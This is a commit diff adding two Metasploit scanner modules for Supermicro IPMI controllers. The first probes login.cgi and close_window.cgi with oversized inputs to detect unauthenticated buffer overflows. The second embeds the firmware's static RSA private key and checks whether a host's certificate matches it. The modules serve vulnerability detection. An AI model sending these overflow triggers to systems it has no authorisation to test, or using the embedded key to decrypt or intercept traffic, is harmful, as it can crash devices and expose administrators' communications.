Land rapid7#2610, new Supermicro modules

Author: Tod Beardsley

modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb

@@ -0,0 +1,158 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Supermicro Onboard IPMI CGI Vulnerability Scanner',
+      'Description' => %q{
+        This module checks for known vulnerabilities in the CGI applications of
+        Supermicro Onboard IPMI controllers. These issues currently include
+        several unauthenticated buffer overflows in the login.cgi and close_window.cgi
+        components.
+      },
+      'Author'       =>
+        [
+          'hdm', # Discovery and analysis
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-3621' ],
+          [ 'CVE', '2013-3623' ],
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities']
+        ],
+      'DisclosureDate' => 'Nov 06 2013'))
+
+  end
+
+  def is_supermicro?
+    res = send_request_cgi(
+      {
+        "uri"       => "/",
+        "method"    => "GET"
+      })
+
+    if res and res.code == 200 and res.body =~ /ATEN International Co Ltd\./
+      return true
+    else
+      return false
+    end
+  end
+
+  def send_close_window_request(sess)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => "/cgi/close_window.cgi",
+      'encode_params' => false,
+      'vars_post' => {
+        'sess_sid' => sess
+      }
+    })
+
+    return res
+  end
+
+  def check_close_window
+    safe_check = Rex::Text.rand_text_alpha(20)
+    trigger_check = Rex::Text.rand_text_alpha(132)
+
+    res = send_close_window_request(safe_check)
+
+    unless res and res.code == 200 and res.body =~ /Can't find action/
+      return false
+    end
+
+    res = send_close_window_request(trigger_check)
+
+    unless res and res.code == 500
+      return false
+    end
+
+    return true
+  end
+
+  def send_login_request(name)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => "/cgi/login.cgi",
+      'encode_params' => false,
+      'vars_post' => {
+       'name' => name,
+       'pwd' => Rex::Text.rand_text_alpha(4)
+      }
+    })
+
+    return res
+  end
+
+
+  def check_login
+    safe_check = Rex::Text.rand_text_alpha(20)
+    trigger_check = Rex::Text.rand_text_alpha(300)
+
+    res = send_login_request(safe_check)
+
+    unless res and res.code == 200 and res.body =~ /ATEN International Co Ltd\./ and res.body =~ /top\.location\.href = location\.href/
+      return false
+    end
+
+    res = send_login_request(trigger_check)
+
+    unless res and res.code == 500
+      return false
+    end
+
+    return true
+  end
+
+
+  def run_host(ip)
+    vprint_status("#{peer} - Checking if it's a Supermicro IPMI web interface...")
+    if is_supermicro?
+      vprint_good("#{peer} - Supermicro IPMI web interface found")
+    else
+      vprint_error("#{peer} - Supermicro IPMI web interface not found")
+      return
+    end
+
+    vprint_status("#{peer} - Checking CVE-2013-3621 (login.gi Buffer Overflow) ...")
+    result = check_login
+    if result
+      print_good("#{peer} - Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)")
+      report_vuln({
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :name  => "Supermicro Onboard IPMI login.cgi Buffer Overflow",
+        :refs  => self.references.select do |ref| ref.ctx_val == "2013-3621" end
+      })
+    end
+
+    vprint_status("#{peer} - Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...")
+    result = check_close_window
+    if result
+      print_good("#{peer} - Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)")
+      report_vuln({
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :name  => "Supermicro Onboard IPMI close_window.cgi Buffer Overflow",
+        :refs  => self.references.select { |ref| ref.ctx_val == "2013-3623" }
+      })
+    end
+
+  end
+
+end

modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb

@@ -0,0 +1,99 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  PRIVATE_KEY = <<-EOF.gsub(/^ {4}/, '')
+    -----BEGIN RSA PRIVATE KEY-----
+    MIICXQIBAAKBgQC1q1kR6chWLfwspD84Asyy6EFV6SYRGy/gILsYGtn9kCQi2RFo
+    bNxS5CvphbGWn9D9n5gJpTVWLWb3LwJxGuBKSRj2wrHLlejzw6kSmF+3xFCuMfxV
+    FSj8TM8JqlOqM1c6lvH2MSXnN7pJBVcekNKbBUEfptakPSejStljbXecSwIDAQAB
+    AoGAah4/FzGiboTKCyGeNA+eltsIXzCjpdZlrtwvrbLxpyXtldWKT59XS6ww4mXQ
+    CJYuNBhnbSrt7vrybG0vVfZHEOCvK+5YKBOtvRgrWDgs1Bkc5hsdI5gLx3jE7g6M
+    PuUvD7ueF4OzYeYRrOLWr957jl32n+hD/k65bKWAUp3aTDECQQDqnEPZWlmoH7Jp
+    6woRnEp+1cullHv8DviM5Huh+JeBotSa03p4unhKlRYSqnHdeHU2343n1VUDzvnV
+    LQWi5G+FAkEAxjt0S67lyuuVD842uZRHt2WSQvwt23aKzQ+EJwV0IXYzfefeLzEm
+    dDdvc1AJ31gweAQK89/5/1EEF40K7BJdjwJBAJDFdtTT/QlS7eyQPjlZwVp9IVp+
+    wvdqYZPHlkb/uLYlPZ6Aq01+e6ZCU0mXZgYtQ99lmhKaQQjFmsMiMh0va2UCQA2T
+    NLuaFpJ235ZdgNHknaSpiAKeUmWdEJRKY7poXTONbKlKn6SLsR50TWWQLZzl5SvS
+    2w0oYW5ile0m84CHIXECQQCrABn0HY4Ll9/4FX+OCWamqwENltU1GcGIogeyFymK
+    ZVX8QdAVoUiZoUaVku946j63WNSkI1sU/UWhL6XDt4gx
+    -----END RSA PRIVATE KEY-----
+  EOF
+
+
+  def initialize
+    super(
+      'Name'        => 'Supermicro Onboard IPMI Static SSL Certificate Scanner',
+      'Description' => %q{
+        This module checks for a static SSL certificate shipped with Supermicro Onboard IPMI
+        controllers. An attacker with access to the publicly-available firmware can perform 
+        man-in-the-middle attacks and offline decryption of communication to the controller.
+        This module has been on a Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware
+        version SMT_X9_214.
+      },
+      'Author'       =>
+        [
+          'hdm', # Discovery and analysis
+          'juan' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2013-3619' ],
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities']
+        ],
+      'DisclosureDate' => 'Nov 06 2013'
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+      ], self.class)
+  end
+
+  # Fingerprint a single host
+  def run_host(ip)
+    connect(true, {"SSL" => true}) #Force SSL
+    cert  = OpenSSL::X509::Certificate.new(sock.peer_cert)
+    disconnect
+
+    unless cert
+      vprint_error("#{ip}:#{rport} - No certificate found")
+      return
+    end
+
+    pkey = OpenSSL::PKey::RSA.new(PRIVATE_KEY)
+    result = cert.verify(pkey)
+
+    if result
+      print_good("#{ip}:#{rport} - Vulnerable to CVE-2013-3619 (Static SSL Certificate)")
+      # Report with the the SSL Private Key hash for the host
+      digest = OpenSSL::Digest::SHA1.new(pkey.public_key.to_der).to_s.scan(/../).join(":")
+      report_note(
+        :host  => ip,
+        :proto => 'tcp',
+        :port  => rport,
+        :type  => 'supermicro.ipmi.ssl.certificate.pkey_hash',
+        :data  => digest
+      )
+
+      report_vuln({
+        :host  => rhost,
+        :port  => rport,
+        :proto => 'tcp',
+        :name  => "Supermicro Onboard IPMI Static SSL Certificate",
+        :refs  => self.references
+      })
+    end
+  end
+
+end